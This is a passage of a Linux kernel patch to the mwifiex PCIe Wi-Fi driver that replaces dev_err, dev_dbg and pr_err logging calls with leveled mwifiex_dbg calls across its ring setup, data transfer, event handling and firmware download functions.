buf_pa=%#x:%x\n", - skb, skb->len, skb->data, (u32)buf_pa, - (u32)((u64)buf_pa >> 32)); + mwifiex_dbg(adapter, INFO, + "info: RX ring: skb=%p len=%d data=%p buf_pa=%#x:%x\n", + skb, skb->len, skb->data, (u32)buf_pa, + (u32)((u64)buf_pa >> 32)); card->rx_buf_list[i] = skb; if (reg->pfu_enabled) { @@ -556,8 +564,8 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter) /* Allocate skb here so that firmware can DMA data from it */ skb = dev_alloc_skb(MAX_EVENT_SIZE); if (!skb) { - dev_err(adapter->dev, - "Unable to allocate skb for EVENT buf.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb for EVENT buf.\n"); kfree(card->evtbd_ring_vbase); return -ENOMEM; } @@ -569,10 +577,10 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter) buf_pa = MWIFIEX_SKB_DMA_ADDR(skb); - dev_dbg(adapter->dev, - "info: EVT ring: skb=%p len=%d data=%p buf_pa=%#x:%x\n", - skb, skb->len, skb->data, (u32)buf_pa, - (u32)((u64)buf_pa >> 32)); + mwifiex_dbg(adapter, EVENT, + "info: EVT ring: skb=%p len=%d data=%p buf_pa=%#x:%x\n", + skb, skb->len, skb->data, (u32)buf_pa, + 
(u32)((u64)buf_pa >> 32)); card->evt_buf_list[i] = skb; card->evtbd_ring[i] = (void *)(card->evtbd_ring_vbase + @@ -715,21 +723,23 @@ static int mwifiex_pcie_create_txbd_ring(struct mwifiex_adapter *adapter) card->txbd_ring_size = sizeof(struct mwifiex_pcie_buf_desc) * MWIFIEX_MAX_TXRX_BD; - dev_dbg(adapter->dev, "info: txbd_ring: Allocating %d bytes\n", - card->txbd_ring_size); + mwifiex_dbg(adapter, INFO, + "info: txbd_ring: Allocating %d bytes\n", + card->txbd_ring_size); card->txbd_ring_vbase = pci_alloc_consistent(card->dev, card->txbd_ring_size, &card->txbd_ring_pbase); if (!card->txbd_ring_vbase) { - dev_err(adapter->dev, - "allocate consistent memory (%d bytes) failed!\n", - card->txbd_ring_size); + mwifiex_dbg(adapter, ERROR, + "allocate consistent memory (%d bytes) failed!\n", + card->txbd_ring_size); return -ENOMEM; } - dev_dbg(adapter->dev, - "info: txbd_ring - base: %p, pbase: %#x:%x, len: %x\n", - card->txbd_ring_vbase, (unsigned int)card->txbd_ring_pbase, - (u32)((u64)card->txbd_ring_pbase >> 32), card->txbd_ring_size); + mwifiex_dbg(adapter, DATA, + "info: txbd_ring - base: %p, pbase: %#x:%x, len: %x\n", + card->txbd_ring_vbase, (unsigned int)card->txbd_ring_pbase, + (u32)((u64)card->txbd_ring_pbase >> 32), + card->txbd_ring_size); return mwifiex_init_txq_ring(adapter); } @@ -777,23 +787,24 @@ static int mwifiex_pcie_create_rxbd_ring(struct mwifiex_adapter *adapter) card->rxbd_ring_size = sizeof(struct mwifiex_pcie_buf_desc) * MWIFIEX_MAX_TXRX_BD; - dev_dbg(adapter->dev, "info: rxbd_ring: Allocating %d bytes\n", - card->rxbd_ring_size); + mwifiex_dbg(adapter, INFO, + "info: rxbd_ring: Allocating %d bytes\n", + card->rxbd_ring_size); card->rxbd_ring_vbase = pci_alloc_consistent(card->dev, card->rxbd_ring_size, &card->rxbd_ring_pbase); if (!card->rxbd_ring_vbase) { - dev_err(adapter->dev, - "allocate consistent memory (%d bytes) failed!\n", - card->rxbd_ring_size); + mwifiex_dbg(adapter, ERROR, + "allocate consistent memory (%d bytes) failed!\n", + card->rxbd_ring_size); return -ENOMEM; } - dev_dbg(adapter->dev, - "info: rxbd_ring - base: %p, pbase: %#x:%x, len: %#x\n", - card->rxbd_ring_vbase, (u32)card->rxbd_ring_pbase, - (u32)((u64)card->rxbd_ring_pbase >> 32), - card->rxbd_ring_size); + mwifiex_dbg(adapter, DATA, + "info: rxbd_ring - base: %p, pbase: %#x:%x, len: %#x\n", + card->rxbd_ring_vbase, (u32)card->rxbd_ring_pbase, + (u32)((u64)card->rxbd_ring_pbase >> 32), + card->rxbd_ring_size); return mwifiex_init_rxq_ring(adapter); } @@ -840,23 +851,24 @@ static int mwifiex_pcie_create_evtbd_ring(struct mwifiex_adapter *adapter) card->evtbd_ring_size = sizeof(struct mwifiex_evt_buf_desc) * MWIFIEX_MAX_EVT_BD; - dev_dbg(adapter->dev, "info: evtbd_ring: Allocating %d bytes\n", + mwifiex_dbg(adapter, INFO, + "info: evtbd_ring: Allocating %d bytes\n", card->evtbd_ring_size); card->evtbd_ring_vbase = pci_alloc_consistent(card->dev, card->evtbd_ring_size, &card->evtbd_ring_pbase); if (!card->evtbd_ring_vbase) { - dev_err(adapter->dev, - "allocate consistent memory (%d bytes) failed!\n", - card->evtbd_ring_size); + mwifiex_dbg(adapter, ERROR, + "allocate consistent memory (%d bytes) failed!\n", + card->evtbd_ring_size); return -ENOMEM; } - dev_dbg(adapter->dev, - "info: CMDRSP/EVT bd_ring - base: %p pbase: %#x:%x len: %#x\n", - card->evtbd_ring_vbase, (u32)card->evtbd_ring_pbase, - (u32)((u64)card->evtbd_ring_pbase >> 32), - card->evtbd_ring_size); + mwifiex_dbg(adapter, EVENT, + "info: CMDRSP/EVT bd_ring - base: %p pbase: %#x:%x len: %#x\n", + card->evtbd_ring_vbase, 
(u32)card->evtbd_ring_pbase, + (u32)((u64)card->evtbd_ring_pbase >> 32), + card->evtbd_ring_size); return mwifiex_pcie_init_evt_ring(adapter); } @@ -895,8 +907,8 @@ static int mwifiex_pcie_alloc_cmdrsp_buf(struct mwifiex_adapter *adapter) /* Allocate memory for receiving command response data */ skb = dev_alloc_skb(MWIFIEX_UPLD_SIZE); if (!skb) { - dev_err(adapter->dev, - "Unable to allocate skb for command response data.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb for command response data.\n"); return -ENOMEM; } skb_put(skb, MWIFIEX_UPLD_SIZE); @@ -944,14 +956,16 @@ static int mwifiex_pcie_alloc_sleep_cookie_buf(struct mwifiex_adapter *adapter) card->sleep_cookie_vbase = pci_alloc_consistent(card->dev, sizeof(u32), &card->sleep_cookie_pbase); if (!card->sleep_cookie_vbase) { - dev_err(adapter->dev, "pci_alloc_consistent failed!\n"); + mwifiex_dbg(adapter, ERROR, + "pci_alloc_consistent failed!\n"); return -ENOMEM; } /* Init val of Sleep Cookie */ *(u32 *)card->sleep_cookie_vbase = FW_AWAKE_COOKIE; - dev_dbg(adapter->dev, "alloc_scook: sleep cookie=0x%x\n", - *((u32 *)card->sleep_cookie_vbase)); + mwifiex_dbg(adapter, INFO, + "alloc_scook: sleep cookie=0x%x\n", + *((u32 *)card->sleep_cookie_vbase)); return 0; } @@ -993,8 +1007,8 @@ static int mwifiex_clean_pcie_ring_buf(struct mwifiex_adapter *adapter) */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DNLD_RDY)) { - dev_err(adapter->dev, - "failed to assert dnld-rdy interrupt.\n"); + mwifiex_dbg(adapter, ERROR, + "failed to assert dnld-rdy interrupt.\n"); return -1; } } @@ -1018,13 +1032,14 @@ static int mwifiex_pcie_send_data_complete(struct mwifiex_adapter *adapter) /* Read the TX ring read pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->tx_rdptr, &rdptr)) { - dev_err(adapter->dev, - "SEND COMP: failed to read reg->tx_rdptr\n"); + mwifiex_dbg(adapter, ERROR, + "SEND COMP: failed to read reg->tx_rdptr\n"); return -1; } - dev_dbg(adapter->dev, "SEND COMP: rdptr_prev=0x%x, rdptr=0x%x\n", - card->txbd_rdptr, rdptr); + mwifiex_dbg(adapter, DATA, + "SEND COMP: rdptr_prev=0x%x, rdptr=0x%x\n", + card->txbd_rdptr, rdptr); num_tx_buffs = MWIFIEX_MAX_TXRX_BD << reg->tx_start_ptr; /* free from previous txbd_rdptr to current txbd_rdptr */ @@ -1038,9 +1053,9 @@ static int mwifiex_pcie_send_data_complete(struct mwifiex_adapter *adapter) skb = card->tx_buf_list[wrdoneidx]; if (skb) { - dev_dbg(adapter->dev, - "SEND COMP: Detach skb %p at txbd_rdidx=%d\n", - skb, wrdoneidx); + mwifiex_dbg(adapter, DATA, + "SEND COMP: Detach skb %p at txbd_rdidx=%d\n", + skb, wrdoneidx); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); @@ -1112,8 +1127,9 @@ mwifiex_pcie_send_data(struct mwifiex_adapter *adapter, struct sk_buff *skb, __le16 *tmp; if (!(skb->data && skb->len)) { - dev_err(adapter->dev, "%s(): invalid parameter <%p, %#x>\n", - __func__, skb->data, skb->len); + mwifiex_dbg(adapter, ERROR, + "%s(): invalid parameter <%p, %#x>\n", + __func__, skb->data, skb->len); return -1; } @@ -1121,7 +1137,8 @@ mwifiex_pcie_send_data(struct mwifiex_adapter *adapter, struct sk_buff *skb, mwifiex_pm_wakeup_card(adapter); num_tx_buffs = MWIFIEX_MAX_TXRX_BD << reg->tx_start_ptr; - dev_dbg(adapter->dev, "info: SEND DATA: \n", + mwifiex_dbg(adapter, DATA, + "info: SEND DATA: \n", card->txbd_rdptr, card->txbd_wrptr); if (mwifiex_pcie_txbd_not_full(card)) { u8 *payload; @@ -1175,39 +1192,40 @@ mwifiex_pcie_send_data(struct mwifiex_adapter *adapter, struct sk_buff *skb, /* Write the TX ring write pointer in to reg->tx_wrptr */ if 
(mwifiex_write_reg(adapter, reg->tx_wrptr, card->txbd_wrptr | rx_val)) { - dev_err(adapter->dev, - "SEND DATA: failed to write reg->tx_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "SEND DATA: failed to write reg->tx_wrptr\n"); ret = -1; goto done_unmap; } if ((mwifiex_pcie_txbd_not_full(card)) && tx_param->next_pkt_len) { /* have more packets and TxBD still can hold more */ - dev_dbg(adapter->dev, - "SEND DATA: delay dnld-rdy interrupt.\n"); + mwifiex_dbg(adapter, DATA, + "SEND DATA: delay dnld-rdy interrupt.\n"); adapter->data_sent = false; } else { /* Send the TX ready interrupt */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DNLD_RDY)) { - dev_err(adapter->dev, - "SEND DATA: failed to assert dnld-rdy interrupt.\n"); + mwifiex_dbg(adapter, ERROR, + "SEND DATA: failed to assert dnld-rdy interrupt.\n"); ret = -1; goto done_unmap; } } - dev_dbg(adapter->dev, "info: SEND DATA: Updated and sent packet to firmware successfully\n", - card->txbd_rdptr, card->txbd_wrptr); + mwifiex_dbg(adapter, DATA, + "info: SEND DATA: Updated and sent packet to firmware successfully\n", + card->txbd_rdptr, card->txbd_wrptr); } else { - dev_dbg(adapter->dev, - "info: TX Ring full, can't send packets to fw\n"); + mwifiex_dbg(adapter, DATA, + "info: TX Ring full, can't send packets to fw\n"); adapter->data_sent = true; /* Send the TX ready interrupt */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DNLD_RDY)) - dev_err(adapter->dev, - "SEND DATA: failed to assert door-bell intr\n"); + mwifiex_dbg(adapter, ERROR, + "SEND DATA: failed to assert door-bell intr\n"); return -EBUSY; } @@ -1243,8 +1261,8 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) /* Read the RX ring Write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->rx_wrptr, &wrptr)) { - dev_err(adapter->dev, - "RECV DATA: failed to read reg->rx_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "RECV DATA: failed to read reg->rx_wrptr\n"); ret = -1; goto done; } @@ -1277,15 +1295,15 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) rx_len = le16_to_cpu(pkt_len); if (WARN_ON(rx_len <= INTF_HEADER_LEN || rx_len > MWIFIEX_RX_DATA_BUF_SIZE)) { - dev_err(adapter->dev, - "Invalid RX len %d, Rd=%#x, Wr=%#x\n", - rx_len, card->rxbd_rdptr, wrptr); + mwifiex_dbg(adapter, ERROR, + "Invalid RX len %d, Rd=%#x, Wr=%#x\n", + rx_len, card->rxbd_rdptr, wrptr); dev_kfree_skb_any(skb_data); } else { skb_put(skb_data, rx_len); - dev_dbg(adapter->dev, - "info: RECV DATA: Rd=%#x, Wr=%#x, Len=%d\n", - card->rxbd_rdptr, wrptr, rx_len); + mwifiex_dbg(adapter, DATA, + "info: RECV DATA: Rd=%#x, Wr=%#x, Len=%d\n", + card->rxbd_rdptr, wrptr, rx_len); skb_pull(skb_data, INTF_HEADER_LEN); if (adapter->rx_work_enabled) { skb_queue_tail(&adapter->rx_data_q, skb_data); @@ -1299,8 +1317,8 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) skb_tmp = mwifiex_alloc_dma_align_buf(MWIFIEX_RX_DATA_BUF_SIZE, GFP_KERNEL | GFP_DMA); if (!skb_tmp) { - dev_err(adapter->dev, - "Unable to allocate skb.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb.\n"); return -ENOMEM; } @@ -1311,9 +1329,9 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) buf_pa = MWIFIEX_SKB_DMA_ADDR(skb_tmp); - dev_dbg(adapter->dev, - "RECV DATA: Attach new sk_buff %p at rxbd_rdidx=%d\n", - skb_tmp, rd_index); + mwifiex_dbg(adapter, INFO, + "RECV DATA: Attach new sk_buff %p at rxbd_rdidx=%d\n", + skb_tmp, rd_index); card->rx_buf_list[rd_index] = skb_tmp; if (reg->pfu_enabled) { @@ 
-1336,28 +1354,29 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) reg->rx_rollover_ind) ^ reg->rx_rollover_ind); } - dev_dbg(adapter->dev, "info: RECV DATA: \n", - card->rxbd_rdptr, wrptr); + mwifiex_dbg(adapter, DATA, + "info: RECV DATA: \n", + card->rxbd_rdptr, wrptr); tx_val = card->txbd_wrptr & reg->tx_wrap_mask; /* Write the RX ring read pointer in to reg->rx_rdptr */ if (mwifiex_write_reg(adapter, reg->rx_rdptr, card->rxbd_rdptr | tx_val)) { - dev_err(adapter->dev, - "RECV DATA: failed to write reg->rx_rdptr\n"); + mwifiex_dbg(adapter, DATA, + "RECV DATA: failed to write reg->rx_rdptr\n"); ret = -1; goto done; } /* Read the RX ring Write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->rx_wrptr, &wrptr)) { - dev_err(adapter->dev, - "RECV DATA: failed to read reg->rx_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "RECV DATA: failed to read reg->rx_wrptr\n"); ret = -1; goto done; } - dev_dbg(adapter->dev, - "info: RECV DATA: Rcvd packet from fw successfully\n"); + mwifiex_dbg(adapter, DATA, + "info: RECV DATA: Rcvd packet from fw successfully\n"); card->rxbd_wrptr = wrptr; } @@ -1376,9 +1395,9 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; if (!(skb->data && skb->len)) { - dev_err(adapter->dev, - "Invalid parameter in %s <%p. len %d>\n", - __func__, skb->data, skb->len); + mwifiex_dbg(adapter, ERROR, + "Invalid parameter in %s <%p. len %d>\n", + __func__, skb->data, skb->len); return -1; } @@ -1391,9 +1410,9 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) * address scratch register */ if (mwifiex_write_reg(adapter, reg->cmd_addr_lo, (u32)buf_pa)) { - dev_err(adapter->dev, - "%s: failed to write download command to boot code.\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to write download command to boot code.\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } @@ -1403,18 +1422,18 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) */ if (mwifiex_write_reg(adapter, reg->cmd_addr_hi, (u32)((u64)buf_pa >> 32))) { - dev_err(adapter->dev, - "%s: failed to write download command to boot code.\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to write download command to boot code.\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } /* Write the command length to cmd_size scratch register */ if (mwifiex_write_reg(adapter, reg->cmd_size, skb->len)) { - dev_err(adapter->dev, - "%s: failed to write command len to cmd_size scratch reg\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to write command len to cmd_size scratch reg\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } @@ -1422,8 +1441,8 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Ring the door bell */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DOOR_BELL)) { - dev_err(adapter->dev, - "%s: failed to assert door-bell intr\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to assert door-bell intr\n", __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } @@ -1443,8 +1462,8 @@ static int mwifiex_pcie_init_fw_port(struct mwifiex_adapter *adapter) /* Write the RX ring read pointer in to reg->rx_rdptr */ if (mwifiex_write_reg(adapter, reg->rx_rdptr, card->rxbd_rdptr | tx_wrap)) { - dev_err(adapter->dev, - 
"RECV DATA: failed to write reg->rx_rdptr\n"); + mwifiex_dbg(adapter, ERROR, + "RECV DATA: failed to write reg->rx_rdptr\n"); return -1; } return 0; @@ -1462,15 +1481,16 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) u8 *payload = (u8 *)skb->data; if (!(skb->data && skb->len)) { - dev_err(adapter->dev, "Invalid parameter in %s <%p, %#x>\n", - __func__, skb->data, skb->len); + mwifiex_dbg(adapter, ERROR, + "Invalid parameter in %s <%p, %#x>\n", + __func__, skb->data, skb->len); return -1; } /* Make sure a command response buffer is available */ if (!card->cmdrsp_buf) { - dev_err(adapter->dev, - "No response buffer available, send command failed\n"); + mwifiex_dbg(adapter, ERROR, + "No response buffer available, send command failed\n"); return -EBUSY; } @@ -1503,8 +1523,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) address */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_lo, (u32)cmdrsp_buf_pa)) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } @@ -1512,8 +1532,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) address */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_hi, (u32)((u64)cmdrsp_buf_pa >> 32))) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } @@ -1523,16 +1543,16 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Write the lower 32bits of the physical address to reg->cmd_addr_lo */ if (mwifiex_write_reg(adapter, reg->cmd_addr_lo, (u32)cmd_buf_pa)) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } /* Write the upper 32bits of the physical address to reg->cmd_addr_hi */ if (mwifiex_write_reg(adapter, reg->cmd_addr_hi, (u32)((u64)cmd_buf_pa >> 32))) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } @@ -1540,8 +1560,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Write the command length to reg->cmd_size */ if (mwifiex_write_reg(adapter, reg->cmd_size, card->cmd_buf->len)) { - dev_err(adapter->dev, - "Failed to write cmd len to reg->cmd_size\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write cmd len to reg->cmd_size\n"); ret = -1; goto done; } @@ -1549,8 +1569,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Ring the door bell */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DOOR_BELL)) { - dev_err(adapter->dev, - "Failed to assert door-bell intr\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to assert door-bell intr\n"); ret = -1; goto done; } @@ -1574,7 +1594,8 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) u16 rx_len; __le16 pkt_len; - dev_dbg(adapter->dev, "info: Rx CMD Response\n"); + mwifiex_dbg(adapter, CMD, + "info: Rx CMD Response\n"); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_FROMDEVICE); @@ -1598,8 +1619,8 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_SLEEP_CFM_DONE)) { - dev_warn(adapter->dev, - "Write register 
failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } mwifiex_delay_for_sleep_cookie(adapter, @@ -1608,8 +1629,8 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) mwifiex_pcie_ok_to_access_hw(adapter)) usleep_range(50, 60); } else { - dev_err(adapter->dev, - "There is no command but got cmdrsp\n"); + mwifiex_dbg(adapter, ERROR, + "There is no command but got cmdrsp\n"); } memcpy(adapter->upld_buf, skb->data, min_t(u32, MWIFIEX_SIZE_OF_CMD_BUFFER, skb->len)); @@ -1628,15 +1649,15 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) will prevent firmware from writing to the same response buffer again. */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_lo, 0)) { - dev_err(adapter->dev, - "cmd_done: failed to clear cmd_rsp_addr_lo\n"); + mwifiex_dbg(adapter, ERROR, + "cmd_done: failed to clear cmd_rsp_addr_lo\n"); return -1; } /* Write the upper 32bits of the cmdrsp buffer physical address */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_hi, 0)) { - dev_err(adapter->dev, - "cmd_done: failed to clear cmd_rsp_addr_hi\n"); + mwifiex_dbg(adapter, ERROR, + "cmd_done: failed to clear cmd_rsp_addr_hi\n"); return -1; } } @@ -1678,25 +1699,28 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) mwifiex_pm_wakeup_card(adapter); if (adapter->event_received) { - dev_dbg(adapter->dev, "info: Event being processed, " - "do not process this interrupt just yet\n"); + mwifiex_dbg(adapter, EVENT, + "info: Event being processed,\t" + "do not process this interrupt just yet\n"); return 0; } if (rdptr >= MWIFIEX_MAX_EVT_BD) { - dev_dbg(adapter->dev, "info: Invalid read pointer...\n"); + mwifiex_dbg(adapter, ERROR, + "info: Invalid read pointer...\n"); return -1; } /* Read the event ring write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->evt_wrptr, &wrptr)) { - dev_err(adapter->dev, - "EventReady: failed to read reg->evt_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "EventReady: failed to read reg->evt_wrptr\n"); return -1; } - dev_dbg(adapter->dev, "info: EventReady: Initial ", - card->evtbd_rdptr, wrptr); + mwifiex_dbg(adapter, EVENT, + "info: EventReady: Initial ", + card->evtbd_rdptr, wrptr); if (((wrptr & MWIFIEX_EVTBD_MASK) != (card->evtbd_rdptr & MWIFIEX_EVTBD_MASK)) || ((wrptr & reg->evt_rollover_ind) == @@ -1705,7 +1729,8 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) __le16 data_len = 0; u16 evt_len; - dev_dbg(adapter->dev, "info: Read Index: %d\n", rdptr); + mwifiex_dbg(adapter, INFO, + "info: Read Index: %d\n", rdptr); skb_cmd = card->evt_buf_list[rdptr]; mwifiex_unmap_pci_memory(adapter, skb_cmd, PCI_DMA_FROMDEVICE); @@ -1723,7 +1748,8 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) evt_len = le16_to_cpu(data_len); skb_trim(skb_cmd, evt_len); skb_pull(skb_cmd, INTF_HEADER_LEN); - dev_dbg(adapter->dev, "info: Event length: %d\n", evt_len); + mwifiex_dbg(adapter, EVENT, + "info: Event length: %d\n", evt_len); if ((evt_len > 0) && (evt_len < MAX_EVENT_SIZE)) memcpy(adapter->event_body, skb_cmd->data + @@ -1740,8 +1766,8 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) } else { if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_EVENT_DONE)) { - dev_warn(adapter->dev, - "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } } @@ -1766,15 +1792,16 @@ static int mwifiex_pcie_event_complete(struct mwifiex_adapter *adapter, return 
0; if (rdptr >= MWIFIEX_MAX_EVT_BD) { - dev_err(adapter->dev, "event_complete: Invalid rdptr 0x%x\n", - rdptr); + mwifiex_dbg(adapter, ERROR, + "event_complete: Invalid rdptr 0x%x\n", + rdptr); return -EINVAL; } /* Read the event ring write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->evt_wrptr, &wrptr)) { - dev_err(adapter->dev, - "event_complete: failed to read reg->evt_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "event_complete: failed to read reg->evt_wrptr\n"); return -1; } @@ -1791,9 +1818,9 @@ static int mwifiex_pcie_event_complete(struct mwifiex_adapter *adapter, desc->flags = 0; skb = NULL; } else { - dev_dbg(adapter->dev, - "info: ERROR: buf still valid at index %d, <%p, %p>\n", - rdptr, card->evt_buf_list[rdptr], skb); + mwifiex_dbg(adapter, ERROR, + "info: ERROR: buf still valid at index %d, <%p, %p>\n", + rdptr, card->evt_buf_list[rdptr], skb); } if ((++card->evtbd_rdptr & MWIFIEX_EVTBD_MASK) == MWIFIEX_MAX_EVT_BD) { @@ -1802,18 +1829,20 @@ static int mwifiex_pcie_event_complete(struct mwifiex_adapter *adapter, reg->evt_rollover_ind); } - dev_dbg(adapter->dev, "info: Updated ", - card->evtbd_rdptr, wrptr); + mwifiex_dbg(adapter, EVENT, + "info: Updated ", + card->evtbd_rdptr, wrptr); /* Write the event ring read pointer in to reg->evt_rdptr */ if (mwifiex_write_reg(adapter, reg->evt_rdptr, card->evtbd_rdptr)) { - dev_err(adapter->dev, - "event_complete: failed to read reg->evt_rdptr\n"); + mwifiex_dbg(adapter, ERROR, + "event_complete: failed to read reg->evt_rdptr\n"); return -1; } - dev_dbg(adapter->dev, "info: Check Events Again\n"); + mwifiex_dbg(adapter, EVENT, + "info: Check Events Again\n"); ret = mwifiex_pcie_process_event_ready(adapter); return ret; @@ -1840,17 +1869,18 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; if (!firmware || !firmware_len) { - dev_err(adapter->dev, - "No firmware image found! Terminating download\n"); + mwifiex_dbg(adapter, ERROR, + "No firmware image found! 
Terminating download\n"); return -1; } - dev_dbg(adapter->dev, "info: Downloading FW image (%d bytes)\n", - firmware_len); + mwifiex_dbg(adapter, INFO, + "info: Downloading FW image (%d bytes)\n", + firmware_len); if (mwifiex_pcie_disable_host_int(adapter)) { - dev_err(adapter->dev, - "%s: Disabling interrupts failed.\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: Disabling interrupts failed.\n", __func__); return -1; } @@ -1872,8 +1902,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, ret = mwifiex_read_reg(adapter, reg->cmd_size, &len); if (ret) { - dev_warn(adapter->dev, - "Failed reading len from boot code\n"); + mwifiex_dbg(adapter, FATAL, + "Failed reading len from boot code\n"); goto done; } if (len) @@ -1884,8 +1914,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (!len) { break; } else if (len > MWIFIEX_UPLD_SIZE) { - pr_err("FW download failure @ %d, invalid length %d\n", - offset, len); + mwifiex_dbg(adapter, ERROR, + "FW download failure @ %d, invalid length %d\n", + offset, len); ret = -1; goto done; } @@ -1895,14 +1926,16 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (len & BIT(0)) { block_retry_cnt++; if (block_retry_cnt > MAX_WRITE_IOMEM_RETRY) { - pr_err("FW download failure @ %d, over max " - "retry count\n", offset); + mwifiex_dbg(adapter, ERROR, + "FW download failure @ %d, over max\t" + "retry count\n", offset); ret = -1; goto done; } - dev_err(adapter->dev, "FW CRC error indicated by the " - "helper: len = 0x%04X, txlen = %d\n", - len, txlen); + mwifiex_dbg(adapter, ERROR, + "FW CRC error indicated by the\t" + "helper: len = 0x%04X, txlen = %d\n", + len, txlen); len &= ~BIT(0); /* Setting this to 0 to resend from same offset */ txlen = 0; @@ -1913,7 +1946,7 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (firmware_len - offset < txlen) txlen = firmware_len - offset; - dev_dbg(adapter->dev, "."); + mwifiex_dbg(adapter, INFO, "."); tx_blocks = (txlen + card->pcie.blksz_fw_dl - 1) / card->pcie.blksz_fw_dl; @@ -1927,8 +1960,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, /* Send the boot command to device */ if (mwifiex_pcie_send_boot_cmd(adapter, skb)) { - dev_err(adapter->dev, - "Failed to send firmware download command\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to send firmware download command\n"); ret = -1; goto done; } @@ -1937,9 +1970,10 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, do { if 